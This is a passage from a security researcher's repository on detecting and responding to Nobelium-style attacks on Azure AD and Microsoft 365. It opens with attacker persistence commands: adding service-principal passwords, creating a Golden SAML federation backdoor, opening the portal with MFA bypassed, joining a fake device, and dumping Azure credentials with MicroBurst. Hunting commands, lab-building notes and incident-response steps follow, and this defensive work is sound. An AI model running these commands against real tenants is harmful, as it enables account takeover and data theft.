278 | PS> New-AzureADServicePrincipalPasswordCredential -objectid $sp.ObjectId -EndDate "01-01-2030 12:00:00" -StartDate "04-04-2020 12:00:00"  -Value PASSWORD  
279 | ```
280 | Creates the Azure AD audit log event "Add service principal credentials"
281 | 
282 | ### Configuring new or modifying existing federation trusts to perform Golden SAML attacks
283 | 
284 | * Adding new federation trusts to or modifying existing federation trusts to add new token-signing certificates, to forge SAML authentication tokens
285 | 
286 | ```
287 | PS> Get-AADIntAccessTokenForAADGraph -savetocache                                                                       
288 | PS> ConvertTo-AADIntBackdoor -domain maliciousdomain.com     
289 | PS> get-msoluser | select UserPrincipalName, ImmutableId  
290 | PS> Open-AADIntOffice365Portal -ImmutableID $id -UseBuiltInCertificate -ByPassMFA $true -Issuer ISSUER  
291 | ```
292 | Creates the Azure AD audit log event "Set domain authentication"
293 | 
294 | ```
295 | PS> Get-MSOLUser | Where-Object{$\_.DisplayName -eq 'Will'} | select UserPrincipalName, ImmutableId  
296 | PS> Get-MsolDomainFederationSettings -DomainName $domainname | Select IssuerUri  
297 | PS> Get-MsolDomainFederationSettings -DomainName $domainname | Select *  
298 | PS> Set-MsolDomainFederationSettings -DomainName $domainname -NextSigningCertificate $malicious_cert  
299 | PS> Get-MsolDomainFederationSettings -DomainName $domainname | Select *  
300 | PS> Open-AADIntOffice365Portal -ImmutableID $id -UseBuiltInCertificate -ByPassMFA $true -Issuer $issueruri  
301 | ```
302 | 
303 | AuditLogs | where OperationName =~ "Set federation settings on domain"
304 | 
305 | ### Joining a fake device to Azure AD
306 | 
307 | * [Journey to Azure AD PRT: Getting access with pass-the-token and pass-the-cert](https://o365blog.com/post/prt/)
308 | 
309 | ```
310 | Join-AADIntDeviceToAzureAD -DeviceName "My computer" -DeviceType "Commodore" -OSVersion "C64"
311 | $prtKeys = Get-AADIntUserPRTKeys -PfxFileName .\d03994c9-24f8-41ba-a156-1805998d6dc7.pfx
312 | ```
313 | 
314 | ### Dumping credentials for Azure resources
315 | 
316 | * [Microburst] (https://github.com/NetSPI/MicroBurst)
317 | * [Get-AzPassword](https://www.netspi.com/blog/technical/cloud-penetration-testing/a-beginners-guide-to-gathering-azure-passwords/)
318 | * [Azure PrivEsc](https://www.youtube.com/watch?v=OES9RU0WTH0&ab_channel=DEFCONConference)
319 | 
320 | ```
321 | Import-Module Microburst.psm1
322 | Get-AzurePasswords
323 | Get-AzurePasswords -Verbose | Out-GridView
324 | ```
325 | ### Modify conditional access to add in MFA trusted IPs
326 | 
327 | ## Pass the certificate
328 | 
329 | * [Azure AD Pass The Certificate](https://medium.com/@mor2464/azure-ad-pass-the-certificate-d0c5de624597)
330 | 
331 | ## Hunting for backdoors 
332 | 
333 | * Audit federation trusts
334 | * Audit service principal credentials, permissions and reply URLs
335 | * Audit conditional access rules 
336 | * Hunt for suspicious AD Sync account logons 
337 | * Hunt for modifications to conditional access rules 
338 | * Hunt for suspicious sign-ins by service principals (Using AADServicePrincipalSignInLogs logs. Requires additional configuration to be sent to Sentinel)
339 | * Hunt for service principals accessing users' mailboxes (MailItemsAccessed log is enabled by default for users that are assigned an Office 365 or Microsoft 365 E5 license or for organizations with a Microsoft 365 E5 Compliance add-on subscription. The MailItemsAccessed mailbox auditing action covers all mail protocols: POP, IMAP, MAPI, EWS, Exchange ActiveSync, and REST.)
340 | 
341 | 
342 | ```
343 | PS> Install-module AzureADPreview -AllowClobber
344 | PS> Connect-AzureAD  
345 | 
346 | PS> Install-module ExchangeOnlineManagement  
347 | PS> Connect-ExchangeOnline  
348 | 
349 | PS> Install-module MSOnline  
350 | PS> Connect-MsolService  
351 | 
352 | PS> Install-Module AZ
353 | PS> Connect-AzAccount
354 | 
355 | PS> # CISA's Sparrow  
356 | PS> Invoke-WebRequest 'https://github.com/cisagov/Sparrow/raw/develop/Sparrow.ps1' -OutFile 'Sparrow.ps1' -UseBasicParsing   
357 | PS> .\Sparrow.ps1  
358 | 
359 | PS> # CrowdStrike's Azure Reporting Tool (CRT)  
360 | PS> Invoke-WebRequest 'https://github.com/CrowdStrike/CRT/raw/main/Get-CRTReport.ps1' -OutFile 'Get-CRTReport.ps1' -UseBasicParsing  
361 | PS> .\Get-CRTReport.ps1  
362 | 
363 | PS> # AzureHound  
364 | PS> Invoke-WebRequest 'https://raw.githubusercontent.com/BloodHoundAD/AzureHound/master/AzureHound.ps1' -OutFile 'AzureHound.ps1' -UseBasicParsing  
365 | PS> . .\AzureHound.ps1  
366 | PS> Invoke-AzureHound  
367 | 
368 | PS> # Hawk
369 | PS> Install-module hawk
370 | PS> start-hawktenantinvestigation  
371 | ```
372 | 
373 | ### Commands to manually audit federation trusts
374 | 
375 | **Azure AD**
376 | 
377 | PS> Get-MsolDomain | Format-List 
378 | PS> Get-AzureADDomain | Format-List (newer version of the command above)
379 | PS> Get-MsolFederationProperty -DomainName ******* | Format-List
380 | 
381 | **Exchange Online** (unclear if these can be changed, Exchange Online PowerShell APIs to configure these state they only work for on-prem Exchange)
382 | 
383 | PS> Get-FederationTrust | Format-List
384 | PS> Get-FederatedOrganizationIdentifier -IncludeExtendedDomainInfo  | Format-List
385 | PS> Get-FederatedOrganizationIdentifier -IncludeExtendedDomainInfo | select-object -expandproperty Domains  
386 | 
387 | ### Commands to manually audit service principals
388 | 
389 | * CISA Sparrow script provides the best data for this
390 | * Audit the creation and use of credentials for service principal. 
391 | * Review the permissions assigned to service principles. 
392 | * Audit the assignment of credentials to applications that allow non-interactive sign-in by the application and permissions for the Microsoft Graph API.
393 | * Look for unusual application usage, such as use of dormant applications.
394 | 
395 | #### Review service principals with credentials 
396 | 
397 | ```
398 | PS> Get-AzureADServicePrincipal  
399 | PS> Get-AzureADServicePrincipal -all $true | Where-Object{$\_.KeyCredentials -ne $null} | Select *  
400 | PS> Get-AzureADServicePrincipal -all $true | Where-Object{$\_.PasswordCredentials -ne $null} | Select *   
401 | ```
402 | 
403 | ### Review service principals with credentials and risky permissions 
404 | 
405 | See scripts output in Sparrow and CRT tool.  
406 | 
407 | ```
408 | PS> # Get Service Principal using objectId  
409 | PS> $sp = Get-AzureADServicePrincipal -ObjectId "OBJECTID"    
410 | 
411 | PS> # Get Azure AD App role assignments using objectID of the Service Principal (users)  
412 | PS> $assignments = Get-AzureADServiceAppRoleAssignment -ObjectId $sp.ObjectId -All $true   
413 | 
414 | PS> # Get all delegated permissions for the service principal  
415 | PS> $spOAuth2PermissionsGrants = Get-AzureADOAuth2PermissionGrant -All $true| Where-Object {$\_.clientId -eq $sp.ObjectId} | Format-List  
416 | 
417 | PS> # Get all application permissions for the service principal  
418 | PS> $spApplicationPermissions = Get-AzureADServiceAppRoleAssignedTo -ObjectId $sp.ObjectId -All $true | Where-Object { $\_.PrincipalType -eq "ServicePrincipal" }
419 | 
420 | PS> # Get all application permissions to Microsoft Graph for the service principal  
421 | PS> $spApplicationPermissions = Get-AzureADServiceAppRoleAssignedTo -ObjectId $sp.ObjectId -All $true | Where-Object {$\_.DisplayName -eq "Microsoft Graph"}    
422 | 
423 | PS> # Look up Microsoft Graph permissions    
424 | PS> $GraphSP = Get-AzureADServicePrincipal -All $true | Where-Object {$\_.DisplayName -eq "Microsoft Graph"}    
425 | PS> $GraphAppRoles = $GraphSP.AppRoles | Select-Object -Property AllowedMemberTypes, Id, Value    
426 | PS> $GraphAppRoles| Where-Object {$\_.Id -eq "e2a3a72e-5f79-4c64-b1b1-878b674786c9" -or $\_.Id -eq "810c84a8-4a9e-49e6-bf7d-12d183f40d01"}    
427 | ```
428 | 
429 | App permissions reference https://docs.microsoft.com/en-us/graph/permissions-reference   
430 | 
431 | List of risky app permissions https://github.com/mepples21/azureadconfigassessment  
432 | 
433 | Creat a test app https://docs.microsoft.com/en-gb/azure/active-directory/develop/quickstart-v2-javascript   
434 | 
435 | Microsoft blog references Mail.Read and Mail.ReadWrite
436 | 
437 | Mimecast: Mimecast ask organisations to add an application/service principal to Azure AD and add a certificate to that service principal, allowing Mimecast to authenticate to it. They then ask organisations to assign that service principal the permissions __full_access_as_app__ to __Office 365 Exchange Online__. See: https://community.mimecast.com/s/article/Creating-an-Office-365-Association-for-Server-Connections-1061681132
438 | 
439 | ### Further hunting 
440 | 
441 | * [Crowdstrike blog on hunting for modifications](https://www.crowdstrike.com/blog/crowdstrike-launches-free-tool-to-identify-and-help-mitigate-risks-in-azure-active-directory/) There is a good list in here of what to search for in Azure AD that goes further than the above including:
442 |   * Reviewing trust relationships with partners including IT consultants, vendors and resellers 
443 |   * Reviewing Azure AD allowed identity providers (SAML IDPs through direct federation or social logins)
444 |   * Reviewing Azure B2B external identities’ access to the Azure portal 
445 |   * Review environment for overly privileged service accounts that may have access to Azure  
446 |  
447 | Use of token-signing certificates to spoof SAML tokens. Azure AD UserAuthenticationMethod: 16457 indicates a password with MFA was satisfied by a federated identity provider: https://twitter.com/ItsReallyNick/status/1349536271010574338?s=20
448 | 
449 | ## Notes on building a lab
450 | 
451 | * Purchase a test domain name. 
452 | * Use Let's Encrypt to issue a wildcard certificate for the domain name. 
453 | * Configure an Azure AD tenant and configure the domain as a custom domain. 
454 | * Deploy three Windows Servers in Azure, and one test workstation. 
455 | * Setup one of the Windows Servers as a domain controller, use the same domain name as previously registered. 
456 | * Domain join all the other systems (after configuring the DC as the DNS server for the VNet). 
457 | * Use AD Connect to configure federation with Azure AD, including configuring the ADFS server and the WAP. 
458 | * Configure 443 access to the WAP from the internet.
459 | * Configure Azure Sentinel, onboard the security logs from all systems and the Azure AD audit logs. 
460 | * Configure the diagnostic settings for Azure AD to collect all logs data types. 
461 | * Enable audit logging in the Security & Compliance Center. 
462 | * Create and configure a test application in Azure AD, configure Mail.Read permissions. Use the web application quick-start to log-in test users to the app and require them to consent access to their data. 
463 | * Create and configure a test application in Azure AD, configure Mail.Read permissions. Grant [admin consent](https://docs.microsoft.com/en-us/azure/active-directory/manage-apps/grant-admin-consent) to the application. 
464 | 


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
  1 | # Responding to sophisticated attacks on Microsoft 365 and Azure AD 
  2 | 
  3 | Working notes on responding to sophisticated attacks on Microsoft 365 and Azure AD (include those carried out by the threat actor [Nobelium](https://www.microsoft.com/security/blog/2021/05/27/new-sophisticated-email-based-attack-from-nobelium/)). 
  4 | 
  5 | ## Background on Nobelium 
  6 | 
  7 | Nobelium has been one of the most prolific and technically-sophisticated threat actors observed over the last couple of years. 
  8 | 
  9 | Nobelium distinguished itself from other threat actors, in its skill and adeptness at compromising organisations' Azure AD and Microsoft 365 cloud environments. Nobelium has been able to do this by combining both well known techniques (e.g. password spraying) and novel techniques into innovative attack paths that allow them to compromise accounts and gain long-term and stealthy access to data stored in cloud services. This is likely reflective of a significant investment Nobelium has made in researching offensive techniques against Microsoft cloud environments.
 10 | 
 11 | We will almost certainly see the techniques and tradecraft Nobelium has developed trickling down to other threat actors over the next couple of years, after Nobelium has demonstrated their effectiveness at gaining stealthy access to data. Nobelium has also demonstrated how these techniques can be used to evade traditional endpoint and network security monitoring, making them especially effective at targeting  organisations with more mature cyber security controls that can reliably detect common attacker techniques on endpoints. 
 12 | 
 13 | We are also likely to see other threat actors following Nobelium's lead in targeting cloud services, given the sensitive data organizations are storing in cloud services often without sufficiently considering the security controls required to protect and monitor it.
 14 | 
 15 | Nobelium has been observed targeting cloud resellers and MSPs, in order to gain access to organisations’ Microsoft cloud environments, as well as directly targeting organisations, through phishing, use of compromise credentials and password spraying. 
 16 | 
 17 | Key links to learn more about Nobelium: 
 18 | 
 19 | * [Mandiant: Remediation and Hardening Strategies for Microsoft 365 to Defend Against UNC2452](https://www.fireeye.com/content/dam/fireeye-www/blog/pdfs/wp-m-unc2452-2021-000343-01.pdf)
 20 | * [Mandiant: Suspected Russian Activity Targeting Government and Business Entities Around the Globe](https://www.mandiant.com/resources/russian-targeting-gov-business)
 21 | * [Microsoft: Technical blog on SolarWinds attacks](https://msrc-blog.microsoft.com/2020/12/13/customer-guidance-on-recent-nation-state-cyber-attacks/)
 22 | * [Microsoft: Updated list of Microsoft blogs](https://msrc-blog.microsoft.com/2020/12/21/december-21st-2020-solorigate-resource-center/)
 23 | * [Microsoft: NOBELIUM targeting delegated administrative privileges to facilitate broader attacks](https://www.microsoft.com/security/blog/2021/10/25/nobelium-targeting-delegated-administrative-privileges-to-facilitate-broader-attacks/)
 24 | * [Microsoft: New activity from Russian actor Nobelium](https://blogs.microsoft.com/on-the-issues/2021/10/24/new-activity-from-russian-actor-nobelium/)
 25 | * [CISA: Eviction Guidance for Networks Affected by the SolarWinds and Active Directory/M365 Compromise](https://www.cisa.gov/uscert/ncas/analysis-reports/ar21-134a)
 26 | * [CISA: Detecting Post-Compromise Threat Activity in Microsoft Cloud Environments](https://us-cert.cisa.gov/ncas/alerts/aa21-008a)
 27 | * [Microsoft: Azure Sentinel Post-Compromise Hunting](https://techcommunity.microsoft.com/t5/azure-sentinel/solarwinds-post-compromise-hunting-with-azure-sentinel/ba-p/1995095)
 28 | * [Microsoft: Advice for incident responders](https://www.microsoft.com/security/blog/2020/12/21/advice-for-incident-responders-on-recovery-from-systemic-identity-compromises/)
 29 | * [Microsoft: Understanding Solorigate's Identity IOCs](https://techcommunity.microsoft.com/t5/azure-active-directory-identity/understanding-quot-solorigate-quot-s-identity-iocs-for-identity/ba-p/2007610)
 30 | 
 31 | ## Key steps to respond to attacks (work in progress v0.2)
 32 | 
 33 | The following ten steps should not necessarily be performed sequentially. Depending on an organisation's risk appetite and response priorities, several of these steps can be performed in parallel or out of order to achieve the best outcome. All errors here are mine and only mine. 
 34 | 
 35 |  1. [Mobilise the incident response team and secure their communications](#mobilise-the-incident-response-team-and-secure-their-communications)
 36 |  2. [Understand how users are authenticated, and how Azure AD and Microsoft 365 are configured](#understand-how-users-are-authenticated-and-how-azure-ad-and-microsoft-365-are-configured)
 37 |  3. [Identify and export available logs and configuration information](#identify-and-export-available-logs-and-configuration-information)
 38 |  4. [Investigate the extent of the attacker activity and the access the attacker has gained to the environment](#investigate-the-extent-of-the-attacker-activity-and-the-access-the-attacker-has-gained-to-the-environment)
 39 |  5. [Take immediate containment measures to remove attacker access to known compromised accounts and identities (Optional)](#take-immediate-containment-measures-to-remove-attacker-access-to-known-compromised-accounts-and-identities)
 40 |  6. [Perform a more comprehensive review to identify any persistent access the attacker has gained to accounts, systems or data](#perform-a-more-comprehensive-review-to-identify-any-persistent-access-the-attacker-has-gained-to-accounts-systems-or-data)
 41 |      + [Hunt for modifications to the configuration of the Azure AD tenant](#hunt-for-modifications-to-the-configuration-of-the-azure-ad-tenant)
 42 |      + [Hunt for Golden SAML Attacks](#hunt-for-golden-saml-attacks)
 43 |      + [Hunt for the compromise of privileged accounts](#hunt-for-the-compromise-of-privileged-accounts)
 44 |      + [Hunt for hijacked Azure AD Applications and Service Principals](#hunt-for-hijacked-azure-ad-applications-and-service-principals)
 45 |      + [Hunt for malicious modifications to mailboxes and the Exchange Online configuration](#hunt-for-malicious-modifications-to-mailboxes-and-the-exchange-online-configuration)
 46 |      + [Hunt for illicit application consent attacks](#hunt-for-illicit-application-consent-attacks)
 47 |      + [Hunt for the compromise of on-premises systems and accounts](#hunt-for-the-compromise-of-on-premises-systems-and-accounts)
 48 |      + [Hunt for the compromise of and malicious changes to Azure resources](#hunt-for-the-compromise-of-and-malicious-changes-to-azure-resources)
 49 |  7. [Monitor for further attacker activity and prepare to rapidly respond](#monitor-for-further-attacker-activity-and-prepare-to-rapidly-respond)
 50 |  8. [Regain administrative control and remove all attacker access](#regain-administrative-control-and-remove-all-attacker-access)
 51 |  9. [Assess data accessed and / or exfiltrated by the attacker](#assess-data-accessed-and-or-exfiltrated-by-the-attacker)
 52 |  10. [Improve security posture to defend against further attacks](#improve-security-posture-to-defend-against-further-attacks)
 53 | 
 54 | Members of the cyber security community that have inspired content for this repo, as well as the work published by **Mandiant**, **Microsoft** and **CISA**, include: 
 55 | * [@DrAzureAD](https://twitter.com/DrAzureAD) - [excellent PowerShell framework AADInternals](https://o365blog.com/aadinternals/) and [blog](https://o365blog.com/)
 56 | * [@DebugPrivilege](https://twitter.com/DebugPrivilege) - [all things incident response](https://m365internals.com/)
 57 | * [@PyroTek3](https://twitter.com/PyroTek3) - [the goto blog on Active Directory](https://adsecurity.org/)
 58 | * [@stevesyfuhs](https://twitter.com/stevesyfuhs) - [checkout these tweet threads](https://syfuhs.net/)
 59 | * [@inversecos](https://twitter.com/inversecos) - [M365 incident response and detections](https://www.inversecos.com)
 60 | 
 61 | Key tools to perform incident response against Azure AD and Microsft 365:
 62 | 
 63 | * [Mandiant Azure AD Investigator](https://github.com/mandiant/Mandiant-Azure-AD-Investigator)
 64 | * [Hawk](https://github.com/T0pCyber/hawk)
 65 | * [Azure AD Investigator PowerShell module](https://github.com/AzureAD/Azure-AD-Incident-Response-PowerShell-Module) (best docs [here](https://m365internals.com/2021/04/17/incident-response-in-a-microsoft-cloud-environment/))
 66 | * [AzureAD Security Assessment](https://github.com/AzureAD/AzureADAssessment)
 67 | * [AzureAD PowerShell module](https://docs.microsoft.com/en-us/powershell/module/azuread/?view=azureadps-2.0)
 68 | * [AADInternals](https://o365blog.com/aadinternals/)
 69 | * [MSOnline PowerShell module](https://docs.microsoft.com/en-us/powershell/module/msonline/?view=azureadps-1.0)
 70 | * [ExchangeOnlineManagement PowerShell module](https://docs.microsoft.com/en-us/powershell/exchange/exchange-online-powershell-v2?view=exchange-ps)
 71 | * [CISA Sparrow](https://github.com/cisagov/Sparrow)
 72 | * [Crowdstrike](https://github.com/CrowdStrike/CRT)
 73 | * [AzureADConfigAssessment Create-AppConsentGrantReport.ps1](https://github.com/mepples21/azureadconfigassessment/blob/master/Create-AppConsentGrantReport.ps1)
 74 | * [Azure Sentinel Detections](https://github.com/Azure/Azure-Sentinel/tree/master/Detections)
 75 | * [Office-365-Extractor](https://github.com/PwC-IR/Office-365-Extractor)
 76 | 
 77 | More good resources to learn more about Azure incident response, Microsoft Sentinel and KQL:
 78 | * [Azure AD incident response playbooks](https://docs.microsoft.com/en-us/security/compass/incident-response-playbooks)
 79 | * [Using KQL in incident response](https://techcommunity.microsoft.com/t5/security-compliance-and-identity/leveraging-the-power-of-kql-in-incident-response/ba-p/3044795)
 80 | * [@reprise_99](https://twitter.com/reprise_99)'s [blog](https://learnsentinel.blog/) and [github repo of Sentinel queries](https://github.com/reprise99/Sentinel-Queries)
 81 | * [Azure Cloud & AI Domain blog](https://azurecloudai.blog/)
 82 | 
 83 | Details on Azure AD offensive techniques and how to simulate these in a lab is covered [here](https://github.com/WillOram/AzureAD-incident-response/blob/main/README-OFFENSIVETECHNIQUES). 
 84 | 
 85 | ## Mobilise the incident response team and secure their communications
 86 | 
 87 | -   **Agree response priorities and objectives** to guide decision making during the course of the response.
 88 | 
 89 | -   **Secure the response team’s communications** to ensure that the attacker is not able to intercept communications (an attacker could have ongoing access to emails if they have compromised the accounts of members of the response team, privileged accounts, or applications and service principals with sufficient permissions).
 90 | 
 91 | -   **Establish response programme governance and workstreams** to ensure that response activities are effectively coordinated.
 92 | 
 93 | -   **Manage the response** by establishing a regular cadence of meetings, tracking progress against the objectives, and managing risks and issues.
 94 | 
 95 | ## Understand how users are authenticated and how Azure AD and Microsoft 365 are configured
 96 | 
 97 | -   **Map out the authentication flows for how users are authenticated**, including what trusted domains are configured, what authentication methods these domains use, and if federated, pass-the-hash, or pass-through-authentication is configured.
 98 | 
 99 | -   **Understand how Azure AD and Microsoft 365 are configured** including what accounts have privileged roles, what trust relationships exist with cloud service providers and how third-parties administer the environment, including reviewing:
100 |     - Trusted domains and federation settings with on-premises Active Directory domains (MSOnline: Get-MsolDomain, Get-MsolFederationProperty)
101 |     - Partner relationships with delegated admin privileges (AADInternals: Get-AADIntMSPartners, requires Global Admin)
102 |     - Accounts that are members of highly privileged roles in Azure AD, including for Global Administrator, Application Administrator, Cloud Application Administrator, Exchange Administrator, Privileged Role Administrator, User Administrator, SharePoint Administrator and Hybrid Identity Administrator (see script referenced in [this whitepaper](https://www.fireeye.com/content/dam/fireeye-www/blog/pdfs/wp-m-unc2452-2021-000343-01.pdf))
103 |     - Accounts that are members of highly privileged roles and synced with on-premises Active Directory domains
104 |     - Accounts with multi-factor authentication enabled and not enabled (Azure AD Investigator: Get-AzureADIRMfaAuthMethodAnalysis)
105 |     - Administer On Behalf Of (AOBO) configured for Azure subscriptions
106 |     - Conditional access rules and trusted locations
107 |     - Legacy authentication settings
108 |     - Azure AD Connect configuration
109 |     - ADFS Application configuration
110 |     - Mailbox authentication settings (ExchangeOnlineManagement: Get-Mailbox -Resultsize Unlimited -Filter | Select UserPrincipalName, Audit*)
111 | 
112 | -   **Understand what services and applications Azure AD provides authentication for**, for example SaaS applications like Salesforce, and how this could be abused by an attacker to gain unauthorised access to data.
113 | 
114 | -   **Understand key roles and responsibilities** within the organisation and of third-parties in administering and securing Azure AD and Office 365.
115 | 
116 | -   **Understand available Azure AD and Microsoft 365 licenses**, and how these are allocated out to employees and accounts.
117 | 
118 | -   **Understand how Azure AD and Office 365 and secured**, including how logs are monitored for security alerts, what security controls / features are configured (e.g. Azure Privileged Identity Management) and how privilege groups are reviewed.
119 | 
120 | ## Identify and export available logs and configuration information
121 | 
122 | -   **Provision Azure AD accounts for the incident response team** secured by multi-factor authentication including the following permissions (adapted from the CISA list [here](https://github.com/cisagov/Sparrow)):
123 | 
124 |     -   **Azure Active Directory**: Global Reader (Global Admin privileges are required to view Partner relationships) 
125 |     -   **Microsoft Sentinel**: Microsoft Sentinel Contributor + Logic App Contributor 
126 |     -   **Security and Compliance Center**: Compliance Administrator
127 |     -   **Exchange Online Admin Center**: View-Only Audit log, View-Only Configuration, View-Only Recipients, Mail Recipients, Security Group Creation and Membership, User options (utilise a custom group for these specific permissions)
128 | 
129 | -   **Standup secure Windows analysis systems** with access to backed up storage. Install the key tools and PowerShell modules listed above.   
130 | 
131 | -   **Review what logs are available from Azure AD, Microsoft 365, and Azure**, including identifying how long logs are being retained for and if logs are being forwarded to a SIEM (see [Key logs to identify and preserve in the initial stages of a response](#key-logs-to-identify-and-preserve-in-the-initial-stages-of-a-response)).
132 | 
133 | -   **Collect key incident response configuration and log information** by running the following tools [Mandiant Azure AD Investigator](https://github.com/mandiant/Mandiant-Azure-AD-Investigator), [Hawk](https://github.com/T0pCyber/hawk), [Azure AD Investigator PowerShell module: Get-AzureADIRMfaAuthMethodAnalysis ](https://github.com/AzureAD/Azure-AD-Incident-Response-PowerShell-Module), [CISA Sparrow](https://github.com/cisagov/Sparrow), [Crowdstrike](https://github.com/CrowdStrike/CRT), [AzureADConfigAssessment Create-AppConsentGrantReport.ps1](https://github.com/mepples21/azureadconfigassessment/blob/master/Create-AppConsentGrantReport.ps1) and [AzureAD Security Assessment](https://github.com/AzureAD/AzureADAssessment) (Connect-AADAssessment, Invoke-AADAssessmentDataCollection, 
134 | Complete-AADAssessmentReports and New-AADAssessmentRecommendations).
135 | 
136 | -   **Export available logs from [Azure AD](https://docs.microsoft.com/en-us/azure/active-directory/reports-monitoring/reference-reports-data-retention), Microsoft 365 Unified Audit Logs (UAL), and [Azure Activity logs](https://docs.microsoft.com/en-us/azure/azure-monitor/essentials/activity-log) for analysis and preservation** (it's important to note that the different ways logs are exported impacts how they can be analysed), if they are not already being forwarded to a Log Analytics workspace or a SIEM. UAL logs can be exported using [Office-365-Extractor](https://github.com/PwC-IR/Office-365-Extractor) and [Mandiant Azure AD Investigator: Get-MandiantBulkUAL](https://github.com/mandiant/Mandiant-Azure-AD-Investigator). Exported UAL logs in the CSV/JSON format can be analysed using the [Power Query JSON transform feature in Excel](https://docs.microsoft.com/en-us/microsoft-365/compliance/export-view-audit-log-records?view=o365-worldwide) and [Azure Data Explorer](https://m365internals.com/2021/04/17/incident-response-in-a-microsoft-cloud-environment/). Given the size of the logs and the time and effort required to export these, this will likely require an iterative effort of performing targeted log exports, analysing the results, and then kicking off more searches. Exported logs should then be combined into a single timeline of interesting events and preserved. Responders should export logs around:
137 |      - times of interest;
138 |      - relating to identified IOCs
139 |      - for known suspected compromised accounts; and,
140 |      - for the use of suspicious commands e.g. [Set-MailboxFolderPermissions](https://docs.microsoft.com/en-us/powershell/module/exchange/set-mailboxfolderpermission?view=exchange-ps).
141 | 	 	 
142 | -   **Review what logs are available for on-premises applications, endpoints and infrastructure**, including identifying how long logs are being retained for and if logs are being forwarded to a SIEM (see [Key logs to identify and preserve in the initial stages of a response](#key-logs-to-identify-and-preserve-in-the-initial-stages-of-a-response)).
143 | 
144 | -   **Export available logs from on-premises applications, endpoints and infrastructure for analysis and preservation**, if they are not already being forwarded to a SIEM.
145 | 
146 | ## Investigate the extent of the attacker activity and the access the attacker has gained to the environment
147 | 
148 | -   **Review and triage outputs of incident response tooling** to identify initial investigative leads, indicators of compromise, and suspicous actiity and configurations that requires further investigtion.
149 | 
150 | -   **Identify identities and systems potentially compromised by the attacker**, by reviewing cloud logs for signs suspicious activity (see section [Key signs of suspicious activity](#key-signs-of-suspicious-activity) below) and any known indicators of compromise.
151 | 
152 | -   **Identify how initial access was gained** for example through phishing, compromise of on-premises environment, brute-forcing cloud accounts or through compromising a cloud service provider (see [Initial access techniques for gaining access to Microsoft 365 and Azure AD](#initial-access-techniques-for-gaining-access-to-microsoft-365-and-azure-ad) below).
153 | 
154 | -   **Investigate the extent of attacker’s activity** including how long the attacker had access to the environment and what they did with this access
155 | 
156 | - **Identify any ‘persistence’ the attacker was using or was able to gain** by reviewing the outputs of the above incident response tools, reviewing Azure AD Sign-in logs for any signs of persistence methods being used (e.g. suspicious sign-ins from Service Principals), and reviewing Azure AD Audit logs for signs of these being configured (e.g. credentials being added to Service Principals).
157 | 
158 | -   **Identify whether the attack used their access to compromise SaaS applications** by reviewing SaaS authentication logs.
159 | 
160 | ## Take immediate containment measures to remove attacker access to known compromised accounts and identities
161 | 
162 | Optional step that depends on an organisation's response priorities and objectives. 
163 | 
164 | -   **Disable known compromised accounts, revoke the account's Azure AD refresh tokens and disable registered devices** ([see this Microsoft article](https://docs.microsoft.com/en-us/azure/active-directory/enterprise-users/users-revoke-access) on the different types of authentication tokens and how to revoke all access for a user)
165 | 
166 | -   **Block logins for known bad IP addresses**, with Conditional Access rules 
167 | 
168 | -   **Remove delegated administrator permissions** from partner relationships (requires an account with Global Admin permissions)
169 | 
170 | -   **Create break-glass Global Admin accounts, monitor their usage and securely store the passwords**
171 | 
172 | -   **Restrict global administrator permissions** to members of the response team
173 | 
174 | -   **Review MFA configuration and validate self-service password reset contact information for privileged accounts**
175 | 
176 | -   **Rotate credentials for Service Principals and Applications and revoke refresh tokens**
177 | 
178 | -   **Reset passwords of all privileged accounts, revoke Azure AD refresh tokens and audit registered devices** 
179 | 
180 | -   **Configure number matching in multifactor authentication (MFA) notifications**
181 | 
182 | -   **Review guest / third-party accounts and disable accounts where possible**
183 | 
184 | ## Perform a more comprehensive review to identify any persistent access the attacker has gained to accounts systems or data 
185 | 
186 | The configuration of Azure AD and Microsoft 365, as well as avaliable logs, should be reviewed for suspicious activity and malicious configuration changes, to identify any persistent access the attacker has gained to accounts, systems or data.
187 | 
188 | 1. [Hunt for modifications to the configuration of the Azure AD tenant](#hunt-for-modifications-to-the-configuration-of-the-azure-ad-tenant)
189 | 2. [Hunt for Golden SAML attacks](#hunt-for-golden-saml-attacks)
190 | 3. [Hunt for the compromise of privileged accounts](#hunt-for-the-compromise-of-privileged-accounts)
191 | 4. [Hunt for hijacked Azure AD Applications and Service Principals](#hunt-for-hijacked-azure-ad-applications-and-service-principals)
192 | 5. [Hunt for malicious modifications to mailboxes and the Exchange Online configuration](#hunt-for-malicious-modifications-to-mailboxes-and-the-exchange-online-configuration)
193 | 6. [Hunt for illicit application consent attacks](#hunt-for-illicit-application-consent-attacks)
194 | 7. [Hunt for the compromise of on-premises systems and accounts](#hunt-for-the-compromise-of-on-premises-systems-and-accounts)
195 | 8. [Hunt for the compromise of and malicious changes to Azure resources](#hunt-for-the-compromise-of-and-malicious-changes-to-azure-resources)
196 |      
197 | ### Hunt for modifications to the configuration of the Azure AD tenant 
198 | 
199 | -   **Review trusted domains and federation settings**, including by comparing the configuration with the on-premises Active Directory ADFS configuration (comparing settings, token URIs and certificates with those configured on the ADFS server) to identify the addition of federation trusts or modification of existing trusts ([T1484.002](https://attack.mitre.org/techniques/T1484/002/)).
200 | 
201 | -   **Review partner relationships and delegated administrator permissions** to identify potentially compromised third-parties the attacker is able to use to maintain access to the tenant, or any malicous [partner relationships](https://o365blog.com/post/partners/) the attacker has added to the tenant
202 | 
203 | -   **Review Conditional Access rules and configured trusted locations**, for modifications to rules for example adding IPs to trusted locations
204 | 
205 | -   **Review Audit AD Audit logs to identify any malicious changes to the Azure AD tenant** for example adding [new or modifying existing federation settings](https://github.com/Azure/Azure-Sentinel/blob/master/Detections/AuditLogs/ADFSDomainTrustMods.yaml), or adding new [partner relationships](https://o365blog.com/post/partners/).
206 | 
207 | -   **Review Azure AD Signin logs to identify suspicious signins by third-party partner accounts using delegated administrator privileges**.  
208 |  
209 | ### Hunt for Golden SAML attacks 
210 | 
211 | -   **Review Azure AD Sign-in logs for evidence of forged SAML tokens being used to authenticate to the tenant**, after the attacker has been able to compromise the organisation's ADFS token-signing certificate. 
212 | 
213 | -   **Review risk events and detections associated with privileged account logins** to identify any compromised accounts. 
214 | 
215 | ### Hunt for the compromise of privileged accounts 
216 | 
217 | -   **Review accounts in privileged Azure AD and Exchange roles to identify any accounts added to privileged roles by the attacker**, including whether guest accounts and accounts used by third-parties have been added to privileged roles.
218 | 
219 | -   **Review Azure AD Sign-in logs to identify:** 
